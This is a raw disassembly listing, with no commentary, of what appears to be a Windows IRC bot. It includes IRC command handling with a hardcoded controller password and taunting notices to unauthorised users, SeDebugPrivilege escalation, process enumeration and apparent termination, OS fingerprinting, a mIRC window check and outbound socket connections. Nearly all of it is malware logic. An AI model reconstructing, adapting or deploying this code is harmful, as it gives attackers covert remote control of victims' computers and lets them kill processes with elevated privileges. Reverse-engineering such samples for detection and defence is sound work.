loc_4158E8: ; CODE XREF: sub_40F6F1+F68�j
; sub_40F6F1+F7F�j
push [ebp+var_90]
push offset dword_438134
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_415956
call sub_417021
push ebx
nop
call near ptr 7C81CDDAh
loc_41590A: ; CODE XREF: sub_40F6F1+F3A�j
; sub_40F6F1+F51�j
push [ebp+esi+var_90]
xor eax, eax
cmp [ebp+var_9B8], bl
setnz al
push eax
lea eax, [ebp+var_928]
push dword_42ED00
push eax
push edi
call sub_4162D6
lea eax, [ebp+var_928]
push eax
push offset aNickS ; "NICK %s\r\n"
push edi
call sub_40DBCA
lea eax, [ebp+var_928]
push eax
push offset dword_434CE4
call sub_40C56B
loc_415953: ; CODE XREF: sub_40F6F1+356E�j
; sub_40F6F1+59A5�j
add esp, 28h
loc_415956: ; CODE XREF: sub_40F6F1+65F�j
; sub_40F6F1+66B�j ...
mov eax, [ebp+arg_24]
jmp loc_40FABB
; ---------------------------------------------------------------------------
loc_41595E: ; CODE XREF: sub_40F6F1+B1E�j
; sub_40F6F1+B33�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_24], esi
jz loc_40FAB8
cmp [ebp+var_AC], ebx
jnz loc_40FAB8
push offset asc_438240 ; "!"
push [ebp+var_94]
call sub_41824D
mov esi, eax
push offset dword_441700
push ebx
inc esi
call sub_41824D
push offset asc_434CE0 ; "~"
push eax
call sub_41824D
push [ebp+arg_24]
mov edi, eax
push offset aC0d1am0z3 ; "c0d1am0z3"
call sub_4177D0
add esp, 20h
test eax, eax
jz short loc_4159F4
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40DBCA
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40DBCA
push edi
push esi
push offset dword_434C58
jmp short loc_415A50
; ---------------------------------------------------------------------------
loc_4159F4: ; CODE XREF: sub_40F6F1+62C8�j
mov [ebp+arg_0], offset off_42EE3C
loc_4159FB: ; CODE XREF: sub_40F6F1+6326�j
mov eax, [ebp+arg_0]
push edi
push dword ptr [eax]
call sub_4171B1
pop ecx
test eax, eax
pop ecx
jnz short loc_415A64
add [ebp+arg_0], 4
cmp [ebp+arg_0], offset off_42EE40
jl short loc_4159FB
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40DBCA
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40DBCA
push edi
push esi
push offset dword_434C1C
loc_415A50: ; CODE XREF: sub_40F6F1+6301�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 30h
jmp loc_4100A4
; ---------------------------------------------------------------------------
loc_415A64: ; CODE XREF: sub_40F6F1+6319�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_415A69: ; CODE XREF: sub_40F6F1+63A2�j
cmp [ebp+arg_24], ebx
jz loc_40FAB8
cmp [edi], bl
jnz short loc_415A89
push [ebp+arg_24]
push offset aC0d1am0z3 ; "c0d1am0z3"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_415A9A
loc_415A89: ; CODE XREF: sub_40F6F1+6383�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_415A69
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_415A9A: ; CODE XREF: sub_40F6F1+6396�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_AA8]
push 7Fh
push eax
push esi
call sub_4182F0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_415AD1
push ebx
push [ebp+var_4]
push offset dword_434BEC
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
add esp, 14h
loc_415AD1: ; CODE XREF: sub_40F6F1+63C4�j
lea eax, [ebp+var_D8]
push eax
push offset dword_434BBC
jmp loc_40FCA1
; ---------------------------------------------------------------------------
loc_415AE2: ; CODE XREF: sub_40F6F1+20E�j
; sub_40F6F1+223�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
push offset aXtIb ; "-xt+iB"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
add esp, 2Ch
mov dword_51564C, edi
jmp loc_40F991
sub_40F6F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B28 proc near ; CODE XREF: sub_408FAC+45�p
; sub_408FAC+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
nop
call near ptr 7C80DDF5h
push eax
call dword_44139C ; OpenProcessToken
test eax, eax
jnz short loc_415B47
leave
retn
; ---------------------------------------------------------------------------
loc_415B47: ; CODE XREF: sub_415B28+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_441374 ; LookupPrivilegeValueA
test eax, eax
jz short loc_415B85
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_415B6E
or [ebp+var_8], 2
jmp short loc_415B72
; ---------------------------------------------------------------------------
loc_415B6E: ; CODE XREF: sub_415B28+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_415B72: ; CODE XREF: sub_415B28+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_441424 ; AdjustTokenPrivileges
mov esi, eax
loc_415B85: ; CODE XREF: sub_415B28+32�j
push [ebp+var_4]
nop
call near ptr 7C809B47h
mov eax, esi
pop esi
leave
retn
sub_415B28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B93 proc near ; CODE XREF: sub_40F6F1+4DE1�p
; sub_415DC2+74�p
var_554 = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_4413D8, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_415D92
cmp dword_4413BC, ebx
jz loc_415D92
cmp dword_4412D8, ebx
jz loc_415D92
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_415B28
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4413D8 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_415D85
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_4413BC ; Process32First
mov esi, dword_42107C
test eax, eax
jz loc_415D80
lea eax, [ebp+var_130]
push eax
push edi
call dword_4412D8 ; Process32Next
test eax, eax
jz loc_415D80
mov edi, dword_4210F8
mov ebx, 1F0FFFh
loc_415C57: ; CODE XREF: sub_415B93+1E5�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_415CBE
mov [ebp+var_4], offset off_43824C
loc_415C65: ; CODE XREF: sub_415B93+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+var_10C]
push eax
nop
call near ptr 7C80BAA1h
test eax, eax
jz short loc_415C8D
add [ebp+var_4], 4
cmp [ebp+var_4], offset dword_438C0C
jl short loc_415C65
jmp loc_415D66
; ---------------------------------------------------------------------------
loc_415C8D: ; CODE XREF: sub_415B93+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_415D66
push 0
push eax
nop
call near ptr 7C801E16h
test eax, eax
jnz loc_415D66
loc_415CB4: ; CODE XREF: sub_415B93+1B9�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_415D66
; ---------------------------------------------------------------------------
loc_415CBE: ; CODE XREF: sub_415B93+C9�j
cmp [ebp+arg_C], eax
jnz loc_415D51
cmp [ebp+arg_4], eax
jz loc_415D66
push [ebp+var_128]
push 8
call dword_4413D8 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_415D11
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_441284 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_415D17
lea eax, [ebp+var_234]
jmp short loc_415D1D
; ---------------------------------------------------------------------------
loc_415D11: ; CODE XREF: sub_415B93+15C�j
push [ebp+var_128]
loc_415D17: ; CODE XREF: sub_415B93+174�j
lea eax, [ebp+var_10C]
loc_415D1D: ; CODE XREF: sub_415B93+17C�j
push eax
lea eax, [ebp+var_554]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_4173AC
add esp, 10h
lea eax, [ebp+var_554]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
jmp loc_415CB4
; ---------------------------------------------------------------------------
loc_415D51: ; CODE XREF: sub_415B93+12E�j
push [ebp+arg_C]
lea eax, [ebp+var_10C]
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_415D99
loc_415D66: ; CODE XREF: sub_415B93+F5�j
; sub_415B93+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_4412D8 ; Process32Next
test eax, eax
jnz loc_415C57
xor ebx, ebx
loc_415D80: ; CODE XREF: sub_415B93+9D�j
; sub_415B93+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_415D85: ; CODE XREF: sub_415B93+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_415B28
pop ecx
pop ecx
loc_415D92: ; CODE XREF: sub_415B93+3A�j
; sub_415B93+46�j ...
xor eax, eax
loc_415D94: ; CODE XREF: sub_415B93+22D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_415D99: ; CODE XREF: sub_415B93+1D1�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
nop
call near ptr 7C801E16h
test eax, eax
jnz short loc_415DBD
push edi
call esi ; CloseHandle
jmp short loc_415D92
; ---------------------------------------------------------------------------
loc_415DBD: ; CODE XREF: sub_415B93+223�j
push 1
pop eax
jmp short loc_415D94
sub_415B93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DC2 proc near ; DATA XREF: sub_40F6F1+5A8F�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset dword_43AD80
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_4173AC
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_415E21
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40DC10
add esp, 14h
loc_415E21: ; CODE XREF: sub_415DC2+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_415B93
add esp, 18h
test eax, eax
jnz short loc_415E49
push offset unk_43AD48
jmp short loc_415E4E
; ---------------------------------------------------------------------------
loc_415E49: ; CODE XREF: sub_415DC2+7E�j
push offset unk_43AD10
loc_415E4E: ; CODE XREF: sub_415DC2+85�j
lea eax, [ebp+var_298]
push eax
call sub_4173AC
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_415E81
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40DC10
add esp, 14h
loc_415E81: ; CODE XREF: sub_415DC2+9D�j
lea eax, [ebp+var_298]
push eax
call sub_40C4F7
push [ebp+var_14]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
sub_415DC2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415EA0 proc near ; CODE XREF: sub_40F6F1+4D83�p
; sub_416F93+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
nop
call near ptr 7C8309E1h
mov esi, eax
test esi, esi
jz short loc_415ED2
push 0
push esi
nop
call near ptr 7C801E16h
test eax, eax
jnz short loc_415ED2
push esi
xor edi, edi
nop
call near ptr 7C809B47h
loc_415ED2: ; CODE XREF: sub_415EA0+1A�j
; sub_415EA0+27�j
mov eax, edi
pop edi
pop esi
retn
sub_415EA0 endp
; ---------------------------------------------------------------------------
byte_415ED7 db 56h ; DATA XREF: ___:0040F0A4�o
dd 16AF633h, 56565656h, 0FCADE856h, 0C483FFFFh, 4835FF18h
dd 90004382h, 3EC54DE8h
db 7Ch, 0EBh, 0E3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EF7 proc near ; CODE XREF: sub_404180+A�p
; sub_404737+16�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_417408
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_421618
call sub_4190C8
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_415EF7 endp
; =============== S U B R O U T I N E =======================================
sub_415F27 proc near ; CODE XREF: sub_4162D6+4C�p
; DATA XREF: ___:off_43ADC8�o
var_C = dword ptr -0Ch
arg_4 = dword ptr 8
push esi
push edi
nop
call near ptr 7C80929Ch
push eax
call sub_4173FE
mov edi, [esp+0Ch+arg_4]
mov [esp+0Ch+var_C], offset dword_515648
push offset dword_42433C
push 1Ch
push edi
call sub_41792A
xor esi, esi
add esp, 10h
cmp dword_42ECFC, esi
jle short loc_415F80
loc_415F5A: ; CODE XREF: sub_415F27+57�j
call sub_417408
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_43ADF4
push 1Ch
push edi
call sub_41792A
add esp, 14h
inc esi
cmp esi, dword_42ECFC
jl short loc_415F5A
loc_415F80: ; CODE XREF: sub_415F27+31�j
mov eax, edi
pop edi
pop esi
retn
sub_415F27 endp
; =============== S U B R O U T I N E =======================================
sub_415F85 proc near ; CODE XREF: sub_40F6F1+3F7A�p
arg_4 = dword ptr 8
push ebx
push esi
push edi
nop
call near ptr 7C80929Ch
push eax
call sub_4173FE
pop ecx
call sub_417408
push 3
mov ebx, [esp+10h+arg_4]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_42ECFC
test esi, esi
jle short loc_415FC8
loc_415FB2: ; CODE XREF: sub_415F85+41�j
call sub_417408
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_415FB2
loc_415FC8: ; CODE XREF: sub_415F85+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_415F85 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0C8h
push ebx
push esi
lea eax, [ebp-0C8h]
push edi
push eax
mov edi, offset byte_43C63C
mov dword ptr [ebp-0C8h], 94h
nop
call near ptr 7C812ADEh
cmp dword ptr [ebp-0C4h], 4
push 0Ah
pop ebx
jnz short loc_41604C
cmp dword ptr [ebp-0C0h], 0
jnz short loc_41602D
cmp dword ptr [ebp-0B8h], 1
jnz short loc_41601D
mov edi, offset a95 ; "95"
loc_41601D: ; CODE XREF: ___:00416016�j
cmp dword ptr [ebp-0B8h], 2
jnz short loc_416088
mov edi, offset aNt ; "NT"
jmp short loc_416088
; ---------------------------------------------------------------------------
loc_41602D: ; CODE XREF: ___:0041600D�j
cmp [ebp-0C0h], ebx
jnz short loc_41603C
mov edi, offset a98 ; "98"
jmp short loc_416088
; ---------------------------------------------------------------------------
loc_41603C: ; CODE XREF: ___:00416033�j
cmp dword ptr [ebp-0C0h], 5Ah
jnz short loc_416083
mov edi, offset aMe ; "ME"
jmp short loc_416088
; ---------------------------------------------------------------------------
loc_41604C: ; CODE XREF: ___:00416004�j
cmp dword ptr [ebp-0C4h], 5
jnz short loc_416083
cmp dword ptr [ebp-0C0h], 0
jnz short loc_416065
mov edi, offset a2k ; "2K"
jmp short loc_416088
; ---------------------------------------------------------------------------
loc_416065: ; CODE XREF: ___:0041605C�j
cmp dword ptr [ebp-0C0h], 1
jnz short loc_416075
mov edi, offset aXp ; "XP"
jmp short loc_416088
; ---------------------------------------------------------------------------
loc_416075: ; CODE XREF: ___:0041606C�j
cmp dword ptr [ebp-0C0h], 2
mov edi, offset dword_43AE3C
jz short loc_416088
loc_416083: ; CODE XREF: ___:00416043�j
; ___:00416053�j
mov edi, offset dword_43AE38
loc_416088: ; CODE XREF: ___:00416024�j
; ___:0041602B�j ...
lea eax, [ebp-0B4h]
push offset dword_441700
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4160A6
mov esi, offset dword_43AE34
jmp short loc_416121
; ---------------------------------------------------------------------------
loc_4160A6: ; CODE XREF: ___:0041609D�j
lea eax, [ebp-0B4h]
push offset a1 ; "1"
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_4160C4
mov esi, offset sub_43AE30
jmp short loc_416121
; ---------------------------------------------------------------------------
loc_4160C4: ; CODE XREF: ___:004160BB�j
lea eax, [ebp-0B4h]
push offset a2 ; "2"
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_4160E2
mov esi, offset sub_43AE2C
jmp short loc_416121
; ---------------------------------------------------------------------------
loc_4160E2: ; CODE XREF: ___:004160D9�j
lea eax, [ebp-0B4h]
push offset dword_43AE28
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_416100
mov esi, offset dword_43AE24
jmp short loc_416121
; ---------------------------------------------------------------------------
loc_416100: ; CODE XREF: ___:004160F7�j
lea eax, [ebp-0B4h]
push offset dword_43AE20
push eax
call sub_417980
pop ecx
mov esi, offset dword_43AE1C
test eax, eax
pop ecx
jnz short loc_416121
mov esi, offset off_43AE18
loc_416121: ; CODE XREF: ___:004160A4�j
; ___:004160C2�j ...
push dword ptr [ebp+8]
call sub_40AFAB
push eax
call sub_40ADFD
pop ecx
test eax, eax
pop ecx
jz short loc_41613C
push offset dword_42D19C
jmp short loc_416141
; ---------------------------------------------------------------------------
loc_41613C: ; CODE XREF: ___:00416133�j
push offset aW ; "W"
loc_416141: ; CODE XREF: ___:0041613A�j
lea eax, [ebp-34h]
push 10h
push eax
call sub_41792A
add esp, 0Ch
lea eax, [ebp-8]
or dword ptr [ebp-4], 0FFFFFFFFh
or dword ptr [ebp-0Ch], 0FFFFFFFFh
push eax
or dword ptr [ebp-8], 0FFFFFFFFh
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-4]
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 0
call sub_40BBF6
pop ecx
push eax
call sub_417FCC
mov eax, [ebp-4]
add esp, 14h
cmp eax, ebx
jge short loc_416199
push eax
push offset a0D ; "0%d"
lea eax, [ebp-18h]
push ebx
push eax
call sub_41792A
add esp, 10h
jmp short loc_4161BD
; ---------------------------------------------------------------------------
loc_416199: ; CODE XREF: ___:00416182�j
cmp eax, 64h
jge short loc_4161AB
lea ecx, [ebp-18h]
push ebx
push ecx
push eax
call sub_4204FC
jmp short loc_4161BA
; ---------------------------------------------------------------------------
loc_4161AB: ; CODE XREF: ___:0041619C�j
push offset a99 ; "99"
lea eax, [ebp-18h]
push ebx
push eax
call sub_41792A
loc_4161BA: ; CODE XREF: ___:004161A9�j
add esp, 0Ch
loc_4161BD: ; CODE XREF: ___:00416197�j
nop
call near ptr 7C80929Ch
push eax
call sub_4173FE
pop ecx
lea eax, [ebp-24h]
push ebx
push eax
push 7
push 800h
nop
call near ptr 7C80D262h
lea eax, [ebp-34h]
push eax
push esi
lea eax, [ebp-18h]
push edi
mov edi, [ebp+0Ch]
push eax
lea eax, [ebp-24h]
push eax
push offset aSSSSS ; "%s|%s|%s|%s|%s|"
push 1Ch
push edi
call sub_41792A
xor esi, esi
add esp, 20h
cmp dword_42ECFC, esi
jle short loc_41622C
loc_416207: ; CODE XREF: ___:0041622A�j
call sub_417408
cdq
mov ecx, ebx
idiv ecx
push edx
push edi
push offset dword_43ADF4
push 1Ch
push edi
call sub_41792A
add esp, 14h
inc esi
cmp esi, dword_42ECFC
jl short loc_416207
loc_41622C: ; CODE XREF: ___:00416205�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416233 proc near ; CODE XREF: sub_4162D6+60�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
nop
call near ptr 7C80929Ch
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_416282
call dword_4413C4 ; FindWindowA
test eax, eax
mov eax, offset off_43AE48
jnz short loc_41626B
mov eax, offset byte_43C63C
loc_41626B: ; CODE XREF: sub_416233+31�j
push eax
push esi
push offset dword_43AE40
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41792A
add esp, 14h
jmp short loc_4162A2
; ---------------------------------------------------------------------------
loc_416282: ; CODE XREF: sub_416233+22�j
call dword_4413C4 ; FindWindowA
test eax, eax
mov eax, offset off_43AE48
jnz short loc_416296
mov eax, offset byte_43C63C
loc_416296: ; CODE XREF: sub_416233+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_4162A2: ; CODE XREF: sub_416233+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_417AF0
pop ecx
cmp eax, 2
pop esi
jbe short loc_4162D1
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_4184C0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_4182F0
add esp, 18h
loc_4162D1: ; CODE XREF: sub_416233+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_416233 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162D6 proc near ; CODE XREF: sub_40F326+CE�p
; sub_40F576+53�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_43ADC4
loc_4162E2: ; CODE XREF: sub_4162D6+3F�j
cmp [ebp+arg_10], 0
jz short loc_4162FD
lea eax, [esi-0Ch]
push eax
push [ebp+arg_10]
call sub_4177D0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_416307
; ---------------------------------------------------------------------------
loc_4162FD: ; CODE XREF: sub_4162D6+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_8]
setz al
loc_416307: ; CODE XREF: sub_4162D6+25�j
test eax, eax
jnz short loc_416319
add esi, 14h
inc edi
cmp esi, 43AE00h
jl short loc_4162E2
jmp short loc_41632B
; ---------------------------------------------------------------------------
loc_416319: ; CODE XREF: sub_4162D6+33�j
push [ebp+arg_4]
lea eax, [edi+edi*4]
push [ebp+arg_0]
call off_43ADC8[eax*4]
pop ecx
pop ecx
loc_41632B: ; CODE XREF: sub_4162D6+41�j
cmp [ebp+arg_C], 0
pop edi
pop esi
jz short loc_41633E
push [ebp+arg_4]
call sub_416233
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41633E: ; CODE XREF: sub_4162D6+5B�j
mov eax, [ebp+arg_4]
pop ebp
retn
sub_4162D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416343 proc near
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_34]
call dword_4413B8 ; ntohs
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_441438 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_416401
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_441360 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_446E1C[ecx], esi
jz short loc_416401
push [ebp+var_34]
push [ebp+var_28]
call dword_441444 ; inet_ntoa
push eax
mov edi, offset dword_515654
push offset unk_43AE4C
push edi
call sub_4173AC
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_40DC10
push edi
call sub_40C4F7
add esp, 28h
loc_416401: ; CODE XREF: sub_416343+5D�j
; sub_416343+7E�j
push esi
call dword_441450 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_416343 endp
; ---------------------------------------------------------------------------
dword_416410 dd 81EC8B55h, 130ECh, 5D8B5300h, 6A575608h, 59F38B2Ah
; DATA XREF: sub_40F6F1+36F1�o
dd 0FF50BD8Dh, 0A5F3FFFFh, 1070358Bh, 83C70042h, 0A0h
dd 1, 75FFFF33h, 0E075FFD4h, 144415FFh, 8D500044h, 0FFFED085h
dd 0AE8468FFh, 0E8500043h, 0F50h, 0FED0858Dh, 0FF68FFFFh
dd 50000001h, 69DC458Bh, 234C0h, 6C100500h, 0E8500044h
dd 1E74h, 8D1CC483h, 8D50F845h, 0FFFF5085h, 685057FFh
dd 416343h, 0E8905757h, 7C3FA19Fh, 4589C73Bh, 390B74FCh
dd 675F47Dh, 0D6FF326Ah, 75FFF5EBh, 94E890FCh, 0FF7C3F36h
dd 88B3h, 0A4BB8900h, 0FF000000h, 0E0458DD6h, 8D50046Ah
dd 0E8500845h, 0FC0h, 0FF0CC483h, 15FF0875h, 4412ECh, 45895040h
dd 0B415FF08h, 89004413h, 458D0845h, 50046A08h, 50E0458Dh
dd 0F97E8h, 0CC48300h, 0FFFF3DE9h
db 0FFh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416501 proc near ; DATA XREF: sub_40F6F1+608F�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_416548
call sub_416561
jmp short loc_41654D
; ---------------------------------------------------------------------------
loc_416548: ; CODE XREF: sub_416501+3E�j
call sub_416885
loc_41654D: ; CODE XREF: sub_416501+45�j
add esp, 10h
push [ebp+var_14]
call sub_417174
pop ecx
push 0
nop
call near ptr 7C80C058h
sub_416501 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416561 proc near ; CODE XREF: sub_416501+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_441488, edi
jnz loc_416693
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
